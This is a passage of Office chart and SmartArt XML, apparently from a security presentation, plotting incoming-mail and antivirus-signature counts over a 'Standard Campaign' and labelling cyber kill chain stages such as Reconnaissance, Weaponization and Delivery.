            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredCategoryTitle>
                <c15:cat>
                  <c:numRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Standard Campaign'!$A$2:$A$77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4-CA6E-4486-A1CF-C9D4F1E985B3}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="5"/>
          <c:order val="5"/>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:val>
            <c:numRef>
              <c:f>'Standard Campaign'!$G$2:$G$77</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="76"/>
                <c:pt idx="61">
                  <c:v>1000</c:v>
                </c:pt>
                <c:pt idx="62">
                  <c:v>50</c:v>
                </c:pt>
                <c:pt idx="63">
                  <c:v>75</c:v>
                </c:pt>
                <c:pt idx="64">
                  <c:v>50</c:v>
                </c:pt>
                <c:pt idx="65">
                  <c:v>10</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredSeriesTitle>
                <c15:tx>
                  <c:strRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Standard Campaign'!$G$1</c15:sqref>
                        </c15:formulaRef>
                      </c:ext>
                    </c:extLst>
                    <c:strCache>
                      <c:ptCount val="1"/>
                      <c:pt idx="0">
                        <c:v>AV Signature</c:v>
                      </c:pt>
                    </c:strCache>
                  </c:strRef>
                </c15:tx>
              </c15:filteredSeriesTitle>
            </c:ext>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredCategoryTitle>
                <c15:cat>
                  <c:numRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Standard Campaign'!$A$2:$A$77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5-CA6E-4486-A1CF-C9D4F1E985B3}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="150"/>
        <c:overlap val="100"/>
        <c:axId val="685783272"/>
        <c:axId val="685787584"/>
      </c:barChart>
      <c:lineChart>
        <c:grouping val="standard"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="6"/>
          <c:order val="6"/>
          <c:spPr>
            <a:ln w="12700" cap="rnd">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:val>
            <c:numRef>
              <c:f>'Standard Campaign'!$H$2:$H$77</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="76"/>
                <c:pt idx="0">
                  <c:v>50</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>75</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>150</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>150</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>200</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>250</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>250</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>250</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>300</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>800</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>1000</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>2000</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>2200</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>1900</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>2000</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>2100</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>2200</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>2200</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>2150</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>2200</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>2500</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>2450</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>2300</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>2200</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>2175</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>2050</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>2000</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>1900</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>1965</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>1875</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>1972</c:v>
                </c:pt>
                <c:pt idx="31">
                  <c:v>1999</c:v>
                </c:pt>
                <c:pt idx="32">
                  <c:v>2050</c:v>
                </c:pt>
                <c:pt idx="33">
                  <c:v>2060</c:v>
                </c:pt>
                <c:pt idx="34">
                  <c:v>2150</c:v>
                </c:pt>
                <c:pt idx="35">
                  <c:v>2101</c:v>
                </c:pt>
                <c:pt idx="36">
                  <c:v>2062</c:v>
                </c:pt>
                <c:pt idx="37">
                  <c:v>1987</c:v>
                </c:pt>
                <c:pt idx="38">
                  <c:v>1946</c:v>
                </c:pt>
                <c:pt idx="39">
                  <c:v>1873</c:v>
                </c:pt>
                <c:pt idx="40">
                  <c:v>1783</c:v>
                </c:pt>
                <c:pt idx="41">
                  <c:v>1773</c:v>
                </c:pt>
                <c:pt idx="42">
                  <c:v>1731</c:v>
                </c:pt>
                <c:pt idx="43">
                  <c:v>1711</c:v>
                </c:pt>
                <c:pt idx="44">
                  <c:v>1623</c:v>
                </c:pt>
                <c:pt idx="45">
                  <c:v>1560</c:v>
                </c:pt>
                <c:pt idx="46">
                  <c:v>1527</c:v>
                </c:pt>
                <c:pt idx="47">
                  <c:v>1450</c:v>
                </c:pt>
                <c:pt idx="48">
                  <c:v>1404</c:v>
                </c:pt>
                <c:pt idx="49">
                  <c:v>1386</c:v>
                </c:pt>
                <c:pt idx="50">
                  <c:v>1343</c:v>
                </c:pt>
                <c:pt idx="51">
                  <c:v>1269</c:v>
                </c:pt>
                <c:pt idx="52">
                  <c:v>1203</c:v>
                </c:pt>
                <c:pt idx="53">
                  <c:v>1184</c:v>
                </c:pt>
                <c:pt idx="54">
                  <c:v>1147</c:v>
                </c:pt>
                <c:pt idx="55">
                  <c:v>1122</c:v>
                </c:pt>
                <c:pt idx="56">
                  <c:v>1054</c:v>
                </c:pt>
                <c:pt idx="57">
                  <c:v>1050</c:v>
                </c:pt>
                <c:pt idx="58">
                  <c:v>1025</c:v>
                </c:pt>
                <c:pt idx="59">
                  <c:v>1017</c:v>
                </c:pt>
                <c:pt idx="60">
                  <c:v>1100</c:v>
                </c:pt>
                <c:pt idx="61">
                  <c:v>1000</c:v>
                </c:pt>
                <c:pt idx="62">
                  <c:v>50</c:v>
                </c:pt>
                <c:pt idx="63">
                  <c:v>75</c:v>
                </c:pt>
                <c:pt idx="64">
                  <c:v>50</c:v>
                </c:pt>
                <c:pt idx="65">
                  <c:v>10</c:v>
                </c:pt>
                <c:pt idx="66">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="67">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="68">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="69">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="70">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="71">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="72">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="73">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="74">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="75">
                  <c:v>0</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="1"/>
          <c:extLst>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredSeriesTitle>
                <c15:tx>
                  <c:strRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Standard Campaign'!$H$1</c15:sqref>
                        </c15:formulaRef>
                      </c:ext>
                    </c:extLst>
                    <c:strCache>
                      <c:ptCount val="1"/>
                      <c:pt idx="0">
                        <c:v>Incoming Mail</c:v>
                      </c:pt>
                    </c:strCache>
                  </c:strRef>
                </c15:tx>
              </c15:filteredSeriesTitle>
            </c:ext>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredCategoryTitle>
                <c15:cat>
                  <c:numRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Standard Campaign'!$A$2:$A$77</c15:sqref>
                        </c15:formulaRef>
                      </c:ext>
                    </c:extLst>
                    <c:numCache>
                      <c:formatCode>h:mm:ss;@</c:formatCode>
                      <c:ptCount val="76"/>
                      <c:pt idx="0">
                        <c:v>0</c:v>
                      </c:pt>
                      <c:pt idx="1">
                        <c:v>3.472222222222222E-3</c:v>
                      </c:pt>
                      <c:pt idx="2">
                        <c:v>6.9444444444444441E-3</c:v>
                      </c:pt>
                      <c:pt idx="3">
                        <c:v>1.0416666666666666E-2</c:v>
                      </c:pt>
                      <c:pt idx="4">
                        <c:v>1.3888888888888888E-2</c:v>
                      </c:pt>
                      <c:pt idx="5">
                        <c:v>1.7361111111111112E-2</c:v>
                      </c:pt>
                      <c:pt idx="6">
                        <c:v>2.0833333333333336E-2</c:v>
                      </c:pt>
                      <c:pt idx="7">
                        <c:v>2.4305555555555559E-2</c:v>
                      </c:pt>
                      <c:pt idx="8">
                        <c:v>2.7777777777777783E-2</c:v>
                      </c:pt>
                      <c:pt idx="9">
                        <c:v>3.1250000000000007E-2</c:v>
                      </c:pt>
                      <c:pt idx="10">
                        <c:v>3.4722222222222231E-2</c:v>
                      </c:pt>
                      <c:pt idx="11">
                        <c:v>3.8194444444444454E-2</c:v>
                      </c:pt>
                      <c:pt idx="12">
                        <c:v>4.1666666666666678E-2</c:v>
                      </c:pt>
                      <c:pt idx="13">
                        <c:v>4.5138888888888902E-2</c:v>
                      </c:pt>
                      <c:pt idx="14">
                        <c:v>4.8611111111111126E-2</c:v>
                      </c:pt>
                      <c:pt idx="15">
                        <c:v>5.208333333333335E-2</c:v>
                      </c:pt>
                      <c:pt idx="16">
                        <c:v>5.5555555555555573E-2</c:v>
                      </c:pt>
                      <c:pt idx="17">
                        <c:v>5.9027777777777797E-2</c:v>
                      </c:pt>
                      <c:pt idx="18">
                        <c:v>6.2500000000000014E-2</c:v>
                      </c:pt>
                      <c:pt idx="19">
                        <c:v>6.5972222222222238E-2</c:v>
                      </c:pt>
                      <c:pt idx="20">
                        <c:v>6.9444444444444461E-2</c:v>
                      </c:pt>
                      <c:pt idx="21">
                        <c:v>7.2916666666666685E-2</c:v>
                      </c:pt>
                      <c:pt idx="22">
                        <c:v>7.6388888888888909E-2</c:v>
                      </c:pt>
                      <c:pt idx="23">
                        <c:v>7.9861111111111133E-2</c:v>
                      </c:pt>
                      <c:pt idx="24">
                        <c:v>8.3333333333333356E-2</c:v>
                      </c:pt>
                      <c:pt idx="25">
                        <c:v>8.680555555555558E-2</c:v>
                      </c:pt>
                      <c:pt idx="26">
                        <c:v>9.0277777777777804E-2</c:v>
                      </c:pt>
                      <c:pt idx="27">
                        <c:v>9.3750000000000028E-2</c:v>
                      </c:pt>
                      <c:pt idx="28">
                        <c:v>9.7222222222222252E-2</c:v>
                      </c:pt>
                      <c:pt idx="29">
                        <c:v>0.10069444444444448</c:v>
                      </c:pt>
                      <c:pt idx="30">
                        <c:v>0.1041666666666667</c:v>
                      </c:pt>
                      <c:pt idx="31">
                        <c:v>0.10763888888888892</c:v>
                      </c:pt>
                      <c:pt idx="32">
                        <c:v>0.11111111111111115</c:v>
                      </c:pt>
                      <c:pt idx="33">
                        <c:v>0.11458333333333337</c:v>
                      </c:pt>
                      <c:pt idx="34">
                        <c:v>0.11805555555555559</c:v>
                      </c:pt>
                      <c:pt idx="35">
                        <c:v>0.12152777777777782</c:v>
                      </c:pt>
                      <c:pt idx="36">
                        <c:v>0.12500000000000003</c:v>
                      </c:pt>
                      <c:pt idx="37">
                        <c:v>0.12847222222222224</c:v>
                      </c:pt>
                      <c:pt idx="38">
                        <c:v>0.13194444444444445</c:v>
                      </c:pt>
                      <c:pt idx="39">
                        <c:v>0.13541666666666666</c:v>
                      </c:pt>
                      <c:pt idx="40">
                        <c:v>0.13888888888888887</c:v>
                      </c:pt>
                      <c:pt idx="41">
                        <c:v>0.14236111111111108</c:v>
                      </c:pt>
                      <c:pt idx="42">
                        <c:v>0.14583333333333329</c:v>
                      </c:pt>
                      <c:pt idx="43">
                        <c:v>0.1493055555555555</c:v>
                      </c:pt>
                      <c:pt idx="44">
                        <c:v>0.15277777777777771</c:v>
                      </c:pt>
                      <c:pt idx="45">
                        <c:v>0.15624999999999992</c:v>
                      </c:pt>
                      <c:pt idx="46">
                        <c:v>0.15972222222222213</c:v>
                      </c:pt>
                      <c:pt idx="47">
                        <c:v>0.16319444444444434</c:v>
                      </c:pt>
                      <c:pt idx="48">
                        <c:v>0.16666666666666655</c:v>
                      </c:pt>
                      <c:pt idx="49">
                        <c:v>0.17013888888888876</c:v>
                      </c:pt>
                      <c:pt idx="50">
                        <c:v>0.17361111111111097</c:v>
                      </c:pt>
                      <c:pt idx="51">
                        <c:v>0.17708333333333318</c:v>
                      </c:pt>
                      <c:pt idx="52">
                        <c:v>0.18055555555555539</c:v>
                      </c:pt>
                      <c:pt idx="53">
                        <c:v>0.1840277777777776</c:v>
                      </c:pt>
                      <c:pt idx="54">
                        <c:v>0.18749999999999981</c:v>
                      </c:pt>
                      <c:pt idx="55">
                        <c:v>0.19097222222222202</c:v>
                      </c:pt>
                      <c:pt idx="56">
                        <c:v>0.19444444444444423</c:v>
                      </c:pt>
                      <c:pt idx="57">
                        <c:v>0.19791666666666644</c:v>
                      </c:pt>
                      <c:pt idx="58">
                        <c:v>0.20138888888888865</c:v>
                      </c:pt>
                      <c:pt idx="59">
                        <c:v>0.20486111111111086</c:v>
                      </c:pt>
                      <c:pt idx="60">
                        <c:v>0.20833333333333307</c:v>
                      </c:pt>
                      <c:pt idx="61">
                        <c:v>0.21180555555555527</c:v>
                      </c:pt>
                      <c:pt idx="62">
                        <c:v>0.21527777777777748</c:v>
                      </c:pt>
                      <c:pt idx="63">
                        <c:v>0.21874999999999969</c:v>
                      </c:pt>
                      <c:pt idx="64">
                        <c:v>0.2222222222222219</c:v>
                      </c:pt>
                      <c:pt idx="65">
                        <c:v>0.22569444444444411</c:v>
                      </c:pt>
                      <c:pt idx="66">
                        <c:v>0.22916666666666632</c:v>
                      </c:pt>
                      <c:pt idx="67">
                        <c:v>0.23263888888888853</c:v>
                      </c:pt>
                      <c:pt idx="68">
                        <c:v>0.23611111111111074</c:v>
                      </c:pt>
                      <c:pt idx="69">
                        <c:v>0.23958333333333295</c:v>
                      </c:pt>
                      <c:pt idx="70">
                        <c:v>0.24305555555555516</c:v>
                      </c:pt>
                      <c:pt idx="71">
                        <c:v>0.24652777777777737</c:v>
                      </c:pt>
                      <c:pt idx="72">
                        <c:v>0.24999999999999958</c:v>
                      </c:pt>
                      <c:pt idx="73">
                        <c:v>0.25347222222222182</c:v>
                      </c:pt>
                      <c:pt idx="74">
                        <c:v>0.25694444444444403</c:v>
                      </c:pt>
                      <c:pt idx="75">
                        <c:v>0.26041666666666624</c:v>
                      </c:pt>
                    </c:numCache>
                  </c:numRef>
                </c15:cat>
              </c15:filteredCategoryTitle>
            </c:ext>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000006-CA6E-4486-A1CF-C9D4F1E985B3}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:marker val="1"/>
        <c:smooth val="0"/>
        <c:axId val="685783272"/>
        <c:axId val="685787584"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="68578327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5787584"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="68578758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5783272"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:val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8C284D-CA17-4E5D-8B69-F0C979D5F9F6}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1B6C08AF-645B-4908-939B-1FFC3B5DB782}">
      <dgm:prSet phldrT="[Text]" custT="1">
        <dgm:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </dgm:style>
      </dgm:prSet>
      <dgm:spPr>
        <a:xfrm>
          <a:off x="0" y="250315"/>
          <a:ext cx="1848397" cy="739358"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="505050"/>
        </a:solidFill>
        <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="505050">
              <a:shade val="50000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:prstDash val="solid"/>
        </a:ln>
        <a:effectLst/>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Reconnaissance</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{85BE8E1F-C0F2-42DD-A617-C789BA6D2C2A}" type="parTrans" cxnId="{4CE96D5F-CA9D-487B-9B92-BB6315B48AE7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D14950A8-E84E-42C6-8041-C9F78A24138F}" type="sibTrans" cxnId="{4CE96D5F-CA9D-487B-9B92-BB6315B48AE7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7FE6211E-F5FF-4D11-8752-3AB6BA59729C}">
      <dgm:prSet phldrT="[Text]" custT="1">
        <dgm:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </dgm:style>
      </dgm:prSet>
      <dgm:spPr>
        <a:xfrm>
          <a:off x="1663557" y="250315"/>
          <a:ext cx="1848397" cy="739358"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="505050"/>
        </a:solidFill>
        <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="505050">
              <a:shade val="50000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:prstDash val="solid"/>
        </a:ln>
        <a:effectLst/>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Weaponization</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C44F43F7-8648-4846-8D8F-A8BBC38371C7}" type="parTrans" cxnId="{960F4F01-5307-4D22-9904-529D536F3B93}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EF6E9039-CA22-4957-B5A8-E7326CEE808A}" type="sibTrans" cxnId="{960F4F01-5307-4D22-9904-529D536F3B93}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2C0FF53C-9599-4663-AA15-6F48C87592AD}">
      <dgm:prSet phldrT="[Text]" custT="1">
        <dgm:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </dgm:style>
      </dgm:prSet>
      <dgm:spPr>
        <a:xfrm>
          <a:off x="3327115" y="250315"/>
          <a:ext cx="1848397" cy="739358"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="505050"/>
        </a:solidFill>
        <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="505050">
              <a:shade val="50000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:prstDash val="solid"/>
        </a:ln>
        <a:effectLst/>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Delivery</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C56BBFC8-FE01-4B07-A630-C11D4837432A}" type="parTrans" cxnId="{9617FEBA-F5DE-4984-A2BE-E91FAF371391}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FF9E8DE5-4F70-4A0F-89ED-1A0A892004B8}" type="sibTrans" cxnId="{9617FEBA-F5DE-4984-A2BE-E91FAF371391}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9418C915-EDC0-4A7B-893A-05CA73CDA0CB}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:xfrm>
          <a:off x="4990672" y="250315"/>
          <a:ext cx="1848397" cy="739358"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">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1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Exploitation</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BA81A173-EAD5-4BE8-A42E-48C593469CA8}" type="parTrans" cxnId="{613BE18B-76C7-4303-9AFF-AE47EDAF6B3E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{305F4BAD-FB41-457B-953B-AB6F8B94F5FD}" type="sibTrans" cxnId="{613BE18B-76C7-4303-9AFF-AE47EDAF6B3E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC3253FA-E764-4D81-BF29-38E03620DDE9}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:xfrm>
          <a:off x="6654230" y="250315"/>
          <a:ext cx="1848397" cy="739358"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">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1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Installation</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{644DABE2-7650-451F-91B5-0F34EE0FE9BF}" type="parTrans" cxnId="{4068BB73-74DA-499A-9E01-83EF1B141CE6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DFD8BFC0-4F10-4AA6-B730-78592865A913}" type="sibTrans" cxnId="{4068BB73-74DA-499A-9E01-83EF1B141CE6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{68D0036A-8557-461D-A4B7-73991B06DF41}">
      <dgm:prSet phldrT="[Text]" custT="1">
        <dgm:style>
          <a:lnRef idx="3">
            <a:schemeClr val="lt1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </dgm:style>
      </dgm:prSet>
      <dgm:spPr>
        <a:xfrm>
          <a:off x="8317788" y="250315"/>
          <a:ext cx="1848397" cy="739358"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="68217A"/>
        </a:solidFill>
        <a:ln w="17145" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:shade val="95000"/>
              <a:alpha val="50000"/>
              <a:satMod val="150000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:prstDash val="solid"/>
        </a:ln>
        <a:effectLst/>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
